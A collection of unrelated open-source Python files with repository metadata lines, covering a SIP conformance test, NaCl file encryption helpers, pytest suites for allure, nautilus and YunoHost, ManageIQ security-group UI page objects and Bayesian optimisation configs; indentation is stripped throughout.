cl = inv.getParsedHeaderValue("Content-Length")
cl.length = 9999
inv.setHeaderValue("Content-Length", cl.create())
self.writeMessageToNetwork(self.neh, inv)
self.code = 0
while (self.code <= 200):
repl = self.readReplyFromNetwork(self.neh)
if (repl is not None) and (repl.code > self.code):
self.code = repl.code
elif repl is None:
self.code = 999
if repl is None:
self.addResult(TestCase.TC_FAILED, "missing reply on request")
self.neh.closeSock()
def onDefaultCode(self, message):
if message.code > self.code:
self.code = message.code
if message.code >= 200:
if message.getParsedHeaderValue("CSeq").method == "INVITE":
Log.logDebug("case207: sending ACK for >= 200 reply", 3)
ack = self.createRequest("ACK", trans=message.transaction)
self.writeMessageToNetwork(self.neh, ack)
if message.code == 400:
self.addResult(TestCase.TC_PASSED, "INVITE rejected with 400")
elif message.code == 200:
if message.transaction.canceled:
Log.logDebug("case207: received 200 for CANCEL", 3)
else:
Log.logDebug("case207: sending BYE for accepted INVITE", 3)
bye = self.createRequest("BYE", dia=message.transaction.dialog)
self.writeMessageToNetwork(self.neh, bye)
rep = self.readReplyFromNetwork(self.neh)
if rep is None:
self.addResult(TestCase.TC_ERROR, "missing response on BYE")
elif message.code != 487:
self.addResult(TestCase.TC_FAILED, "INVITE rejected, but not with 400")
else:
self.addResult(TestCase.TC_FAILED, "INVITE accepted, not rejected with 400")
can = self.createRequest("CANCEL", trans=message.transaction)
message.transaction.canceled = True
self.writeMessageToNetwork(self.neh, can)
canrepl = self.readReplyFromNetwork(self.neh)
if canrepl is None:
self.addResult(TestCase.TC_ERROR, "missing 200 on CANCEL")
| ezigman/sftf | UserAgentBasicTestSuite/case207.py | Python | gpl-2.0 | 3,360 | 0.018155 |
import libnacl.secret
import libnacl.utils
from StringIO import StringIO
from .response import FileObjResponse
from pyramid.httpexceptions import HTTPBadRequest
def generate_secret_key():
return libnacl.utils.salsa_key().encode('hex')
def encrypt_file(key, fileobj, nonce=None):
if nonce is None:
nonce = libnacl.utils.rand_nonce()
box = libnacl.secret.SecretBox(key.decode('hex'))
encrypted = box.encrypt(fileobj.read(), nonce)
return StringIO(encrypted)
def decrypt_file(key, fileobj):
box = libnacl.secret.SecretBox(key.decode('hex'))
decrypted = box.decrypt(fileobj.read())
return StringIO(decrypted)
def validate_key(view_callable):
def inner(context, request):
key = request.params.get('key')
if key is None:
raise HTTPBadRequest('Key missed.')
if len(key) != 64:
raise HTTPBadRequest('The key must be exactly 32 bytes long.')
try:
key.decode('hex')
except TypeError:
raise HTTPBadRequest('Invalid key: Non-hexadecimal digit found.')
return view_callable(context, request)
return inner
| Leits/openprocurement.api.encryprion | openprocurement/api/encryprion/utils.py | Python | apache-2.0 | 1,144 | 0 |
# encoding: utf-8
'''
Tests for various attachment thingies
Created on Oct 21, 2013
@author: pupssman
'''
import pytest
from hamcrest import has_entries, assert_that, is_, contains, has_property
from allure.constants import AttachmentType
from allure.utils import all_of
@pytest.mark.parametrize('package', ['pytest.allure', 'allure'])
def test_smoke(report_for, package):
report = report_for("""
import pytest
import allure
def test_x():
%s.attach('Foo', 'Bar')
""" % package)
assert_that(report.findall('test-cases/test-case/attachments/attachment'), contains(has_property('attrib', has_entries(title='Foo'))))
@pytest.mark.parametrize('a_type', map(lambda x: x[0], all_of(AttachmentType)))
def test_attach_types(report_for, a_type):
report = report_for("""
import allure as A
def test_x():
A.attach('Foo', 'Bar', A.attach_type.%s)
""" % a_type)
assert_that(report.find('.//attachment').attrib, has_entries(title='Foo', type=getattr(AttachmentType, a_type).mime_type))
class TestContents:
@pytest.fixture
def attach_contents(self, report_for, reportdir):
"""
Fixture that returns contents of the attachment file for given attach body
"""
def impl(body):
report = report_for("""
from pytest import allure as A
def test_x():
A.attach('Foo', %s, A.attach_type.TEXT)
""" % repr(body))
filename = report.find('.//attachment').get('source')
return reportdir.join(filename).read('rb')
return impl
def test_ascii(self, attach_contents):
assert_that(attach_contents('foo\nbar\tbaz'), is_(b'foo\nbar\tbaz'))
def test_unicode(self, attach_contents):
assert_that(attach_contents(u'ололо пыщьпыщь').decode('utf-8'), is_(u'ололо пыщьпыщь'))
def test_broken_unicode(self, attach_contents):
assert_that(attach_contents(u'ололо пыщьпыщь'.encode('cp1251')), is_(u'ололо пыщьпыщь'.encode('cp1251')))
def test_attach_in_fixture_teardown(report_for):
"""
Check that calling ``pytest.allure.attach`` in fixture teardown works and attaches it there.
"""
report = report_for("""
import pytest
@pytest.yield_fixture(scope='function')
def myfix():
yield
pytest.allure.attach('Foo', 'Bar')
def test_x(myfix):
assert True
""")
assert_that(report.find('.//attachment').attrib, has_entries(title='Foo'))
| pvarenik/PyCourses | allure-python-master/tests/test_attach.py | Python | gpl-2.0 | 2,550 | 0.002402 |
SCORES = {'A': 100, 'B': 14, 'C': 9, 'D': 28, 'E': 145, 'F': 12, 'G': 3,
'H': 10, 'I': 200, 'J': 100, 'K': 114, 'L': 100, 'M': 25,
'N': 450, 'O': 80, 'P': 2, 'Q': 12, 'R': 400, 'S': 113, 'T': 405,
'U': 11, 'V': 10, 'W': 10, 'X': 3, 'Y': 210, 'Z': 23}
def sexy_name(name):
name_score = sum(SCORES.get(a, 0) for a in name.upper())
if name_score >= 600:
return 'THE ULTIMATE SEXIEST'
elif name_score >= 301:
return 'VERY SEXY'
elif name_score >= 60:
return 'PRETTY SEXY'
return 'NOT TOO SEXY'
| the-zebulan/CodeWars | katas/beta/how_sexy_is_your_name.py | Python | mit | 566 | 0 |
# external imports
import unittest
# local imports
import nautilus
from nautilus.api.endpoints import GraphQLRequestHandler
from ..util import Mock
class TestUtil(unittest.TestCase):
def setUp(self):
# create a service without an explict name
class MyService(nautilus.Service): pass
# save the service record to the test suite
self.service = MyService
def test_has_default_name(self):
# make sure the name matches
assert self.service.name == 'myService', (
"Service did not have the correct name."
)
def test_default_name_can_have_numbers(self):
# create a service without an explict name
class TestService1(nautilus.Service): pass
# make sure the name is what we expect
assert TestService1.name == 'testService1', (
"Service did not have the correct name with number."
)
def test_can_accept_name(self):
class MyService(nautilus.Service):
name = 'foo'
assert MyService.name == 'foo', (
"Service could not recieve custom name."
)
def test_can_initialize_with_schema(self):
# create a mock schema
schema = Mock()
# make sure the internal schema is what we gave it
assert self.service(schema=schema).schema == schema, (
"Service could not be initialized with a specific schema"
)
def test_can_accept_config(self):
# create a config object
config = nautilus.Config(foo='bar')
# make sure the config is what we gave it
assert self.service(config=config).config == config, (
"Service could not be initialized with a specific config."
)
def test_can_merge_config_from_init(self):
# the config of the base class
base_config = nautilus.Config(foo='bar')
# the config to initialize with
init_config = nautilus.Config(foo='baz', wakka='flokka')
class MyConfiguredService(nautilus.Service):
config = base_config
# the mix of the two config
mix_config = base_config.copy()
mix_config.update(init_config)
assert MyConfiguredService(config=init_config).config == mix_config, (
"Service could not mix the initialized config onto the base one."
)
def test_has_request_handler(self):
# check the value of the internal attribute
assert issubclass(self.service().api_request_handler_class, GraphQLRequestHandler), (
"APIGateway did not have the right request handler class"
)
def test_can_summarize(self):
# the target summary
target = {
'name': 'myService',
}
# summarize the service
summarized = self.service().summarize()
# make sure the names match up
assert target['name'] == summarized['name'], (
"Summarzied service did not have the right name."
) | aaivazis/nautilus | tests/services/test_service.py | Python | mit | 2,991 | 0.003678 |
import json
from stats import read_stats
@read_stats
def read_file(file_name, default='"?"'):
try:
file = open(file_name, 'r')
except FileNotFoundError:
print('Creating file {}'.format(file_name))
file = open(file_name, 'w+')
file.write(default)
contents = json.loads(file.read())
file.close()
return contents
def write_file(file_name, data, indent=4):
with open(file_name, 'w+') as file:
file.write(
json.dumps(
data,
sort_keys=True,
indent=indent))
| nickdrozd/ecio-lisp | fileio.py | Python | mit | 581 | 0.003442 |
import os
import pytest
import requests
import requests_mock
import glob
import shutil
from moulinette import m18n
from moulinette.utils.filesystem import read_json, write_to_json, write_to_yaml
from yunohost.utils.error import YunohostError
from yunohost.app import (
_initialize_apps_catalog_system,
_read_apps_catalog_list,
_update_apps_catalog,
_actual_apps_catalog_api_url,
_load_apps_catalog,
app_catalog,
logger,
APPS_CATALOG_CACHE,
APPS_CATALOG_CONF,
APPS_CATALOG_API_VERSION,
APPS_CATALOG_DEFAULT_URL,
)
APPS_CATALOG_DEFAULT_URL_FULL = _actual_apps_catalog_api_url(APPS_CATALOG_DEFAULT_URL)
DUMMY_APP_CATALOG = """{
"apps": {
"foo": {"id": "foo", "level": 4, "category": "yolo", "manifest":{"description": "Foo"}},
"bar": {"id": "bar", "level": 7, "category": "swag", "manifest":{"description": "Bar"}}
},
"categories": [
{"id": "yolo", "description": "YoLo", "title": {"en": "Yolo"}},
{"id": "swag", "description": "sWaG", "title": {"en": "Swag"}}
]
}
"""
class AnyStringWith(str):
def __eq__(self, other):
return self in other
def setup_function(function):
# Clear apps catalog cache
shutil.rmtree(APPS_CATALOG_CACHE, ignore_errors=True)
# Clear apps_catalog conf
if os.path.exists(APPS_CATALOG_CONF):
os.remove(APPS_CATALOG_CONF)
def teardown_function(function):
# Clear apps catalog cache
# Otherwise when using apps stuff after running the test,
# we'll still have the dummy unusable list
shutil.rmtree(APPS_CATALOG_CACHE, ignore_errors=True)
#
# ################################################
#
def test_apps_catalog_init(mocker):
# Cache is empty
assert not glob.glob(APPS_CATALOG_CACHE + "/*")
# Conf doesn't exist yet
assert not os.path.exists(APPS_CATALOG_CONF)
# Initialize ...
mocker.spy(m18n, "n")
_initialize_apps_catalog_system()
m18n.n.assert_any_call("apps_catalog_init_success")
# And a conf with at least one list
assert os.path.exists(APPS_CATALOG_CONF)
apps_catalog_list = _read_apps_catalog_list()
assert len(apps_catalog_list)
# Cache is expected to still be empty though
# (if we did update the apps_catalog during init,
# we couldn't differentiate easily exceptions
# related to lack of network connectivity)
assert not glob.glob(APPS_CATALOG_CACHE + "/*")
def test_apps_catalog_emptylist():
# Initialize ...
_initialize_apps_catalog_system()
# Let's imagine somebody removed the default apps catalog because uh idk they dont want to use our default apps catalog
os.system("rm %s" % APPS_CATALOG_CONF)
os.system("touch %s" % APPS_CATALOG_CONF)
apps_catalog_list = _read_apps_catalog_list()
assert not len(apps_catalog_list)
def test_apps_catalog_update_nominal(mocker):
# Initialize ...
_initialize_apps_catalog_system()
# Cache is empty
assert not glob.glob(APPS_CATALOG_CACHE + "/*")
# Update
with requests_mock.Mocker() as m:
_actual_apps_catalog_api_url,
# Mock the server response with a dummy apps catalog
m.register_uri("GET", APPS_CATALOG_DEFAULT_URL_FULL, text=DUMMY_APP_CATALOG)
mocker.spy(m18n, "n")
_update_apps_catalog()
m18n.n.assert_any_call("apps_catalog_updating")
m18n.n.assert_any_call("apps_catalog_update_success")
# Cache shouldn't be empty anymore empty
assert glob.glob(APPS_CATALOG_CACHE + "/*")
# And if we load the catalog, we sould find
# - foo and bar as apps (unordered),
# - yolo and swag as categories (ordered)
catalog = app_catalog(with_categories=True)
assert "apps" in catalog
assert set(catalog["apps"].keys()) == set(["foo", "bar"])
assert "categories" in catalog
assert [c["id"] for c in catalog["categories"]] == ["yolo", "swag"]
def test_apps_catalog_update_404(mocker):
# Initialize ...
_initialize_apps_catalog_system()
with requests_mock.Mocker() as m:
# 404 error
m.register_uri("GET", APPS_CATALOG_DEFAULT_URL_FULL, status_code=404)
with pytest.raises(YunohostError):
mocker.spy(m18n, "n")
_update_apps_catalog()
m18n.n.assert_any_call("apps_catalog_failed_to_download")
def test_apps_catalog_update_timeout(mocker):
# Initialize ...
_initialize_apps_catalog_system()
with requests_mock.Mocker() as m:
# Timeout
m.register_uri(
"GET", APPS_CATALOG_DEFAULT_URL_FULL, exc=requests.exceptions.ConnectTimeout
)
with pytest.raises(YunohostError):
mocker.spy(m18n, "n")
_update_apps_catalog()
m18n.n.assert_any_call("apps_catalog_failed_to_download")
def test_apps_catalog_update_sslerror(mocker):
# Initialize ...
_initialize_apps_catalog_system()
with requests_mock.Mocker() as m:
# SSL error
m.register_uri(
"GET", APPS_CATALOG_DEFAULT_URL_FULL, exc=requests.exceptions.SSLError
)
with pytest.raises(YunohostError):
mocker.spy(m18n, "n")
_update_apps_catalog()
m18n.n.assert_any_call("apps_catalog_failed_to_download")
def test_apps_catalog_update_corrupted(mocker):
# Initialize ...
_initialize_apps_catalog_system()
with requests_mock.Mocker() as m:
# Corrupted json
m.register_uri(
"GET", APPS_CATALOG_DEFAULT_URL_FULL, text=DUMMY_APP_CATALOG[:-2]
)
with pytest.raises(YunohostError):
mocker.spy(m18n, "n")
_update_apps_catalog()
m18n.n.assert_any_call("apps_catalog_failed_to_download")
def test_apps_catalog_load_with_empty_cache(mocker):
# Initialize ...
_initialize_apps_catalog_system()
# Cache is empty
assert not glob.glob(APPS_CATALOG_CACHE + "/*")
# Update
with requests_mock.Mocker() as m:
# Mock the server response with a dummy apps catalog
m.register_uri("GET", APPS_CATALOG_DEFAULT_URL_FULL, text=DUMMY_APP_CATALOG)
# Try to load the apps catalog
# This should implicitly trigger an update in the background
mocker.spy(m18n, "n")
app_dict = _load_apps_catalog()["apps"]
m18n.n.assert_any_call("apps_catalog_obsolete_cache")
m18n.n.assert_any_call("apps_catalog_update_success")
# Cache shouldn't be empty anymore empty
assert glob.glob(APPS_CATALOG_CACHE + "/*")
assert "foo" in app_dict.keys()
assert "bar" in app_dict.keys()
def test_apps_catalog_load_with_conflicts_between_lists(mocker):
# Initialize ...
_initialize_apps_catalog_system()
conf = [
{"id": "default", "url": APPS_CATALOG_DEFAULT_URL},
{
"id": "default2",
"url": APPS_CATALOG_DEFAULT_URL.replace("yunohost.org", "yolohost.org"),
},
]
write_to_yaml(APPS_CATALOG_CONF, conf)
# Update
with requests_mock.Mocker() as m:
# Mock the server response with a dummy apps catalog
# + the same apps catalog for the second list
m.register_uri("GET", APPS_CATALOG_DEFAULT_URL_FULL, text=DUMMY_APP_CATALOG)
m.register_uri(
"GET",
APPS_CATALOG_DEFAULT_URL_FULL.replace("yunohost.org", "yolohost.org"),
text=DUMMY_APP_CATALOG,
)
# Try to load the apps catalog
# This should implicitly trigger an update in the background
mocker.spy(logger, "warning")
app_dict = _load_apps_catalog()["apps"]
logger.warning.assert_any_call(AnyStringWith("Duplicate"))
# Cache shouldn't be empty anymore empty
assert glob.glob(APPS_CATALOG_CACHE + "/*")
assert "foo" in app_dict.keys()
assert "bar" in app_dict.keys()
def test_apps_catalog_load_with_oudated_api_version(mocker):
# Initialize ...
_initialize_apps_catalog_system()
# Update
with requests_mock.Mocker() as m:
mocker.spy(m18n, "n")
m.register_uri("GET", APPS_CATALOG_DEFAULT_URL_FULL, text=DUMMY_APP_CATALOG)
_update_apps_catalog()
# Cache shouldn't be empty anymore empty
assert glob.glob(APPS_CATALOG_CACHE + "/*")
# Tweak the cache to replace the from_api_version with a different one
for cache_file in glob.glob(APPS_CATALOG_CACHE + "/*"):
cache_json = read_json(cache_file)
assert cache_json["from_api_version"] == APPS_CATALOG_API_VERSION
cache_json["from_api_version"] = 0
write_to_json(cache_file, cache_json)
# Update
with requests_mock.Mocker() as m:
# Mock the server response with a dummy apps catalog
m.register_uri("GET", APPS_CATALOG_DEFAULT_URL_FULL, text=DUMMY_APP_CATALOG)
mocker.spy(m18n, "n")
app_dict = _load_apps_catalog()["apps"]
m18n.n.assert_any_call("apps_catalog_update_success")
assert "foo" in app_dict.keys()
assert "bar" in app_dict.keys()
# Check that we indeed have the new api number in cache
for cache_file in glob.glob(APPS_CATALOG_CACHE + "/*"):
cache_json = read_json(cache_file)
assert cache_json["from_api_version"] == APPS_CATALOG_API_VERSION
| YunoHost/moulinette-yunohost | src/yunohost/tests/test_appscatalog.py | Python | agpl-3.0 | 9,247 | 0.001406 |
#!/usr/bin/env python
import matplotlib.pyplot as plt
import sys
import numpy
from math import floor
def movingAverage(x, N):
cumsum = numpy.cumsum(numpy.insert(x, 0, 0))
return (cumsum[N:] - cumsum[:-N])/N
filename = "reports/configuration.confrewardRecordReport.txt"
if (len(sys.argv) > 1):
filename = sys.argv[1]
with open(filename) as f:
print f.readline()
time = []
temp = []
avg = []
for line in f:
entry = line.split(":")
time.append(float(entry[0]))
temp.append(float(entry[1]))
windowSize = 100
avg = [0] * (windowSize - 1)
avg = avg + list( movingAverage(temp, windowSize))
ratio = 0.999
avg = avg[int(floor(len(avg )*ratio)): len(avg )-1]
time = time[int(floor(len(time)*ratio)): len(time)-1]
temp = temp[int(floor(len(temp)*ratio)): len(temp)-1]
plt.plot(time, temp, 'r-')
plt.plot(time, avg, 'ro')
plt.show()
| Jacques-Florence/schedSim | src/analysis/reward.py | Python | bsd-3-clause | 847 | 0.022432 |
# -*- coding: utf-8 -*-
import attr
from navmazing import NavigateToAttribute, NavigateToSibling
from widgetastic.widget import View, Select
from widgetastic_manageiq import (
Accordion, BaseEntitiesView, BootstrapSelect, BreadCrumb, ItemsToolBarViewSelector,
ManageIQTree, SummaryTable, Text, TextInput)
from widgetastic_patternfly import Dropdown, Button
from cfme.base.ui import BaseLoggedInPage
from cfme.exceptions import ItemNotFound, SecurityGroupsNotFound
from cfme.modeling.base import BaseCollection, BaseEntity
from cfme.utils.appliance.implementations.ui import navigate_to, navigator, CFMENavigateStep
from cfme.utils.blockers import BZ
from cfme.utils.wait import wait_for
class SecurityGroupToolbar(View):
configuration = Dropdown('Configuration')
policy = Dropdown('Policy')
download = Dropdown('Download')
view_selector = View.nested(ItemsToolBarViewSelector)
class SecurityGroupDetailsToolbar(View):
configuration = Dropdown('Configuration')
policy = Dropdown('Policy')
download = Button(title='Download summary in PDF format')
class SecurityGroupDetailsAccordion(View):
@View.nested
class properties(Accordion): # noqa
tree = ManageIQTree()
@View.nested
class relationships(Accordion): # noqa
tree = ManageIQTree()
class SecurityGroupDetailsEntities(View):
breadcrumb = BreadCrumb()
title = Text('//div[@id="main-content"]//h1')
properties = SummaryTable(title='Properties')
relationships = SummaryTable(title='Relationships')
smart_management = SummaryTable(title='Smart Management')
firewall_rules = SummaryTable(title="Firewall Rules")
class SecurityGroupAddEntities(View):
breadcrumb = BreadCrumb()
title = Text('//div[@id="main-content"]//h1')
class SecurityGroupAddForm(View):
network_manager = BootstrapSelect(id='ems_id')
name = TextInput(name='name')
description = TextInput(name='description')
cloud_tenant = Select(name='cloud_tenant_id')
add = Button('Add')
cancel = Button('Cancel')
class SecurityGroupView(BaseLoggedInPage):
"""Base view for header and nav checking, navigatable views should inherit this"""
@property
def in_security_groups(self):
return(
self.logged_in_as_current_user and
self.navigation.currently_selected == ['Networks', 'Security Groups'])
class SecurityGroupAllView(SecurityGroupView):
@property
def is_displayed(self):
return (
self.in_security_groups and
self.entities.title.text == 'Security Groups')
toolbar = View.nested(SecurityGroupToolbar)
including_entities = View.include(BaseEntitiesView, use_parent=True)
class SecurityGroupDetailsView(SecurityGroupView):
@property
def is_displayed(self):
expected_title = '{} (Summary)'.format(self.context['object'].name)
return (
self.in_security_groups and
self.entities.title.text == expected_title and
self.entities.breadcrumb.active_location == expected_title)
toolbar = View.nested(SecurityGroupDetailsToolbar)
sidebar = View.nested(SecurityGroupDetailsAccordion)
entities = View.nested(SecurityGroupDetailsEntities)
class SecurityGroupAddView(SecurityGroupView):
@property
def is_displayed(self):
return (
self.in_security_groups and
self.entities.breadcrumb.active_location == 'Add New Security Group' and
self.entities.title.text == 'Add New Security Group')
entities = View.nested(SecurityGroupAddEntities)
form = View.nested(SecurityGroupAddForm)
@attr.s
class SecurityGroup(BaseEntity):
""" Automate Model page of SecurityGroup
Args:
provider (obj): Provider name for Network Manager
name(str): name of the Security Group
description (str): Security Group description
"""
_param_name = "SecurityGroup"
name = attr.ib()
provider = attr.ib()
description = attr.ib(default="")
def refresh(self):
self.provider.refresh_provider_relationships()
self.browser.refresh()
def delete(self, cancel=False, wait=False):
view = navigate_to(self, 'Details')
view.toolbar.configuration.item_select('Delete this Security Group',
handle_alert=(not cancel))
# cancel doesn't redirect, confirmation does
view.flush_widget_cache()
if not cancel:
view = self.create_view(SecurityGroupAllView)
view.is_displayed
view.flash.assert_success_message('Delete initiated for 1 Security Group.')
if wait:
wait_for(
lambda: self.name in view.entities.all_entity_names,
message="Wait Security Group to disappear",
fail_condition=True,
num_sec=500,
timeout=1000,
delay=20,
fail_func=self.refresh
)
@property
def exists(self):
try:
navigate_to(self, 'Details')
except SecurityGroupsNotFound:
return False
else:
return True
@attr.s
class SecurityGroupCollection(BaseCollection):
""" Collection object for the :py:class: `cfme.cloud.SecurityGroup`. """
ENTITY = SecurityGroup
def create(self, name, description, provider, cancel=False, wait=False):
"""Create new Security Group.
Args:
provider (obj): Provider name for Network Manager
name (str): name of the Security Group
description (str): Security Group description
cancel (boolean): Cancel Security Group creation
wait (boolean): wait if Security Group created
"""
view = navigate_to(self, 'Add')
changed = view.form.fill({'network_manager': "{} Network Manager".format(provider.name),
'name': name,
'description': description,
'cloud_tenant': 'admin'})
if cancel and changed:
view.form.cancel.click()
flash_message = 'Add of new Security Group was cancelled by the user'
else:
view.form.add.click()
flash_message = 'Security Group "{}" created'.format(name)
# add/cancel should redirect, new view
view = self.create_view(SecurityGroupAllView)
view.flash.assert_success_message(flash_message)
view.entities.paginator.set_items_per_page(500)
sec_groups = self.instantiate(name, provider, description)
if wait:
wait_for(
lambda: sec_groups.name in view.entities.all_entity_names,
message="Wait Security Group to appear",
num_sec=400,
timeout=1000,
delay=20,
fail_func=sec_groups.refresh,
handle_exception=True
)
return sec_groups
# TODO: Delete collection as Delete option is not available on List view and update
@navigator.register(SecurityGroupCollection, 'All')
class SecurityGroupAll(CFMENavigateStep):
VIEW = SecurityGroupAllView
prerequisite = NavigateToAttribute('appliance.server', 'LoggedIn')
def step(self, *args, **kwargs):
self.prerequisite_view.navigation.select('Networks', 'Security Groups')
@navigator.register(SecurityGroup, 'Details')
class Details(CFMENavigateStep):
VIEW = SecurityGroupDetailsView
prerequisite = NavigateToAttribute('parent', 'All')
def step(self, *args, **kwargs):
try:
self.prerequisite_view.entities.get_entity(name=self.obj.name, surf_pages=True).click()
except ItemNotFound:
raise SecurityGroupsNotFound("Security Groups {} not found".format(
self.obj.name))
@navigator.register(SecurityGroupCollection, 'Add')
class Add(CFMENavigateStep):
VIEW = SecurityGroupAddView
prerequisite = NavigateToSibling("All")
def step(self, *args, **kwargs):
"""Raises DropdownItemDisabled from widgetastic_patternfly
if no RHOS Network manager present"""
# Todo remove when fixed 1520669
if (BZ(1520669, forced_streams='5.9').blocks and
self.prerequisite_view.flash.messages):
self.prerequisite_view.flash.dismiss()
self.prerequisite_view.toolbar.configuration.item_select('Add a new Security Group')
| akarol/cfme_tests | cfme/cloud/security_groups.py | Python | gpl-2.0 | 8,515 | 0.001292 |
import gpbo
xrange=range
from gpbo.core import GPdc as GPdc
import scipy as sp
class eimledefault():
"""
fixed s, space is [-1,1]^D
"""
def __init__(self,f,D,n,s,path,fname):
self.aqfn = gpbo.core.acquisitions.EIMAPaq
self.aqpara= {
'ev': {'s': s, 'd': [sp.NaN]},
'lb': [-1.]*D,
'ub': [1.]*D,
'nrandinit': 10,
'mprior': sp.array([1.]+[-1]*D),
'sprior': sp.array([2.]*(D+1)),
'kindex': GPdc.MAT52,
'maxf':500+100*D,
'overhead':None,
'dpara': {'user_data': [],
'algmethod': 1,
'maxf': 500+100*D,
'logfilename': '/dev/null'},
'lpara': {'gtol': 0.00001,
'maxfun': 200}
}
self.stoppara = {'nmax': n}
self.stopfn = gpbo.core.optimize.nstopfn
self.reccfn = gpbo.core.reccomenders.gpmaprecc
self.reccpara = {
'ev':self.aqpara['ev'],
'lb':self.aqpara['lb'],
'ub':self.aqpara['ub'],
'mprior':self.aqpara['mprior'],
'sprior':self.aqpara['sprior'],
'kindex':self.aqpara['kindex'],
'maxf':500+100*D,
'onlyafter':self.aqpara['nrandinit'],
'check':True,
'smode':'direct',
'dpara':self.aqpara['dpara'],
'lpara':self.aqpara['lpara'],
'everyn':1
}
self.ojfchar = {'dx': len(self.aqpara['lb']), 'dev': len(self.aqpara['ev'])}
self.ojf=f
self.path = path
self.fname = fname
return
import copy
class eifixdefault():
"""
fixed s, space is [-1,1]^D
"""
def __init__(self,f,D,n,s,path,fname):
self.aqfn = gpbo.core.acquisitions.EIFIXaq
self.aqpara= {
'ev': {'s': s, 'd': [sp.NaN]},
'lb': [-1.]*D,
'ub': [1.]*D,
'nrandinit': 10,
'hyper': sp.array([1.]+[0.5]*D),
'kindex': GPdc.MAT52,
'maxf':500+100*D,
'overhead':None,
'dpara': {'user_data': [],
'algmethod': 1,
'maxf': 2000,
'logfilename': '/dev/null'},
'lpara': {'gtol': 0.00001,
'maxfun': 200}
}
self.stoppara = {'nmax': n}
self.stopfn = gpbo.core.optimize.nstopfn
self.reccfn = gpbo.core.reccomenders.gpfixrecc
self.reccpara = {
'ev':self.aqpara['ev'],
'lb':self.aqpara['lb'],
'ub':self.aqpara['ub'],
'hyper':self.aqpara['hyper'],
'kindex':self.aqpara['kindex'],
'maxf':500+100*D,
'onlyafter':self.aqpara['nrandinit'],
'check':True,
'smode':'direct',
'dpara':copy.deepcopy(self.aqpara['dpara']),
'lpara':self.aqpara['lpara'],
'everyn':1
}
self.ojfchar = {'dx': len(self.aqpara['lb']), 'dev': len(self.aqpara['ev'])}
self.ojf=f
self.path = path
self.fname = fname
return
class eimlelearns():
"""
fixed s, space is [-1,1]^D
"""
def __init__(self,f,D,n,s,path,fname):
self.aqfn = gpbo.core.acquisitions.EIMAPaq
self.aqpara= {
'ev': {'s': s, 'd': [sp.NaN]},
'lb': [-1.]*D,
'ub': [1.]*D,
'nrandinit': 10,
'mprior': sp.array([1.]+[0.]*D+[-2]),
'sprior': sp.array([1.]*(D+1)+[5]),
'kindex': GPdc.SQUEXPCS,
'maxf':500+100*D,
'dpara': {'user_data': [],
'algmethod': 1,
'maxf': 500+100*D,
'logfilename': '/dev/null'},
'lpara': {'gtol': 0.00001,
'maxfun': 200}
}
self.stoppara = {'nmax': n}
self.stopfn = gpbo.core.optimize.nstopfn
self.reccfn = gpbo.core.reccomenders.gpmaprecc
self.reccpara = {
'ev':self.aqpara['ev'],
'lb':self.aqpara['lb'],
'ub':self.aqpara['ub'],
'mprior':self.aqpara['mprior'],
'sprior':self.aqpara['sprior'],
'kindex':self.aqpara['kindex'],
'maxf':500+100*D,
'onlyafter':self.aqpara['nrandinit'],
'check':True,
'dpara':self.aqpara['dpara'],
'lpara':self.aqpara['lpara'],
'everyn':1
}
self.ojfchar = {'dx': len(self.aqpara['lb']), 'dev': len(self.aqpara['ev'])}
self.ojf=f
self.path = path
self.fname = fname
return
class eihypdefault(object):
def __init__(self,f,D,n,s,path,fname,nrandinit=10,kindex=GPdc.MAT52):
self.aqfn = gpbo.core.acquisitions.eihypaq
self.aqpara= {
'ev': {'s': s, 'd': [sp.NaN]},
'lb': [-1.]*D,
'ub': [1.]*D,
'nrandinit': nrandinit,
#'maxf':500+100*D,
'mprior': sp.array([1.]+[0.]*D),
'sprior': sp.array([1.]*(D+1)),
'kindex': kindex,
'DH_SAMPLES': 16+6*D,
'drop':True,
'noS': False,
'dpara': {'user_data': [],
'algmethod': 1,
'maxf': 500+100*D,
'logfilename': '/dev/null'},
'lpara': {'gtol': 0.00001,
'maxfun': 200}
}
self.stoppara = {'nmax': n}
self.stopfn = gpbo.core.optimize.nstopfn
self.reccfn = gpbo.core.reccomenders.gphinrecc
self.reccpara = {
'ev':self.aqpara['ev'],
'lb':self.aqpara['lb'],
'ub':self.aqpara['ub'],
'mprior':self.aqpara['mprior'],
'sprior':self.aqpara['sprior'],
'kindex':self.aqpara['kindex'],
'maxf':1000+200*D,
'onlyafter':self.aqpara['nrandinit'],
'check':True,
'dpara':self.aqpara['dpara'],
'lpara':self.aqpara['lpara'],
'everyn':1
}
self.ojfchar = {'dx': len(self.aqpara['lb']), 'dev': len(self.aqpara['ev'])}
self.ojf=f
self.path = path
self.fname = fname
return
class eihypgamma(eihypdefault):
def __init__(self,*args,**kwargs):
super(eihypgamma,self).__init__(*args,**kwargs)
D = len(self.aqpara['lb'])
self.reccpara['kindex']=self.aqpara['kindex']= GPdc.MAT52
self.reccpara['mprior']=self.aqpara['mprior']= sp.array([2.]+[3.]*D)
self.reccpara['sprior']=self.aqpara['sprior']= sp.array([0.5]+[0.15]*D)
self.reccpara['priorshape']=self.aqpara['priorshape']='gamma'
class pesfsdefault(object):
def __init__(self,f,D,n,s,path,fname,ninit=10):
self.aqfn = gpbo.core.acquisitions.PESfsaq
self.aqpara= {
'ev': {'s': s, 'd': [sp.NaN]},
'lb': [-1.]*D,
'ub': [1.]*D,
'nrandinit': ninit,
#'maxf':500+100*D,
'mprior': sp.array([1.]+[0.]*D),
'sprior': sp.array([1.]*(D+1)),
'priorshape' : 'lognorm',
'kindex': GPdc.MAT52,
'DH_SAMPLES': 16+6*D,
'weighted' : 0,
'DM_SAMPLES': 20+8*D,
'DM_SUPPORT': 750+250*D,
'SUPPORT_MODE': [gpbo.core.ESutils.SUPPORT_LAPAPROT],
'DM_SLICELCBPARA': 12+4.*D,
'drop':True,
'overhead':'none',
'noS': False,
'dpara': {'user_data': [],
'algmethod': 1,
'maxf': 500+100*D,
'logfilename': '/dev/null'},
'lpara': {'gtol': 0.00001,
'maxfun': 200}
}
self.stoppara = {'nmax': n}
self.stopfn = gpbo.core.optimize.nstopfn
self.reccfn = gpbo.core.reccomenders.gphinrecc
self.reccpara = {
'ev':self.aqpara['ev'],
'lb':self.aqpara['lb'],
'ub':self.aqpara['ub'],
'mprior':self.aqpara['mprior'],
'sprior':self.aqpara['sprior'],
'kindex':self.aqpara['kindex'],
'maxf':500+100*D,
'onlyafter':self.aqpara['nrandinit'],
'check':True,
'dpara':self.aqpara['dpara'],
'lpara':self.aqpara['lpara'],
'everyn':1
}
